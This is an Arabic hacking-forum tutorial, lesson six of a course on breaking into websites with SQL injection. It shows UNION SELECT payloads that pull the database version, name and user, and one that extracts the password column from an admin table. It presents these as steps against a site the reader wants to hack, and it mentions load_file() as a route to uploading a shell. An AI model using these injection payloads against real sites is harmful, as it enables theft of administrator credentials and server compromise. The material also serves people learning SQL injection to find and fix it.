هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.



 
الرئيسيةالرئيسية  البوابةالبوابة  أحدث الصورأحدث الصور  التسجيلالتسجيل  دخولدخول  

بسم الله الرحمن الرحيم من ادارة المنتدى الى كل الاعضاء او زوار المنتدى مطلوب مشرفين ومراقبين من لدي الخبرة الكافية يقدم طلبة في قسم ادارة المنتدى وسوف يتم مراجعتة من قبل لدارة المنتدى  :::: فتيان الهكر الشيعي


 :: قسم اختراق المواقع والسيرفرات والشبكات :: دورة اختراق المواقع بثغرة sql
 

 [الدرس السادس] تفاصيل حول الأوامر الذي يمكن وضعها مكان الأعمده المصابه

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
Admin


عدد المساهمات : 128
نقاط : 385
تاريخ التسجيل : 05/03/2014
العمر : 30
الموقع : العراق

[الدرس السادس] تفاصيل حول الأوامر الذي يمكن وضعها مكان الأعمده المصابه Empty
مُساهمةموضوع: [الدرس السادس] تفاصيل حول الأوامر الذي يمكن وضعها مكان الأعمده المصابه    [الدرس السادس] تفاصيل حول الأوامر الذي يمكن وضعها مكان الأعمده المصابه Emptyالجمعة مارس 14, 2014 11:18 am



اقتباس :
ثغرات sql injection , شرح استغلال ثغرات sql injection , طريقة اختراق ثغرات sql injection , sql injection
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

شرحنا في الدرس السابق عن استخدام union+select واخراج الاعمده المصابه!
وشرحت ايضا انه مكان الرقم المصاب نضع امر لنا حتى نستخرجه

يعني مثلا طلع عندنا عدد الأعمده 9
وطلع لنا الأعمده المصابه هي 2 و 4 و 6
يكون الامر كالتالي
كود HTML:
union+select+1,2,3,4,5,6,7,8,9--
رح نعمله يستخرج إصدار قاعدة البيانات عن طريق الامر version()
يصبح الامر كالتالي
كود HTML:
union+select+1,version(),3,4,5,6,7,8,9--
هيك رح يظهر لنا اصدار القاعدة

طيب شو بنقدر نحط مكان الاعمده المصابه
بقول لك تقدر تحط اي امر ، مثل
لإستخراج إصدار القاعدة
كود HTML:
version()
لإستخراج اسم القاعدة
كود HTML:
database()
لإستخراج اسم مستخدم القاعدة
كود HTML:
user()
وايضا تستطيع وضع اسم عامود لإستخراج البيانات اللي داخله ، كيف يعني؟!
ملاحة : - رح اشرح في الدروس القادمة طريقة معرفة اسماء الجداول والأعمده في القاعدة واذا يوجد قواعد اخرى
مثلا انت عرفت اسم جدول بالموقع اللي بدك تخترقه وعرفت ايضا اسم عامود
لنقول ان اسم الجدول admin
والعامود password

وبدنا نستخرج البيانات في عامود password من جدول admin

رح يصير الإستغلال
كود HTML:
union+select+1,password,3,4,5,6,7,8,9+from+admin--
شوف كيف صار!! ،
مكان العامود المصاب وضعنا اسم العامود اللي عرفناه اللي هو password
وفي الاخر بعد رقم 9 ، وضعنا from+admin
وتعني احضر المعلومات العامود password من جدول اللي اسمه admin
شرحتها بالدروس السابقه لما قلت لكم
select site from asdely.net
شايفين from asdely.net يعني جيب بيانات عامود اللي اسمه الموقع من الجدول اللي اسمه asdely.net


اعتقد اللي فوق واضح

وايضا تستطيع تنفيذ بعض الدوال في mysql عن طريق وضعها مكان العامود المصاب
مثل load_file('/') اللي بتساعدنا برفع شيل مباشره عن طريق ثغرات ال ، ما بتهمنا هسا لكن رح نشرحها في الدروس القادمه


انتهى الدرس!!
بالتوفيق للجميع

واي استفسار او شيء غير واضح خبروني حتى اعيد شرحه
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://hector-23as.wwooww.net
 
[الدرس السادس] تفاصيل حول الأوامر الذي يمكن وضعها مكان الأعمده المصابه
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» [الدرس السابع] تفاصيل حول قاعدة information_schema
» [ الدرس السادس ] خصائص وتكوين باتش بيفروست Bifrost
» [الدرس الرابع] شرح order+by لمعرفة عدد الأعمده - دورة sql injection
» [الدرس الخامس] معرفة الأعمده المصابة عن طريق union+select
» موقع تحديد مكان الاي بي من الخريطة

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
 :: قسم اختراق المواقع والسيرفرات والشبكات :: دورة اختراق المواقع بثغرة sql-
انتقل الى: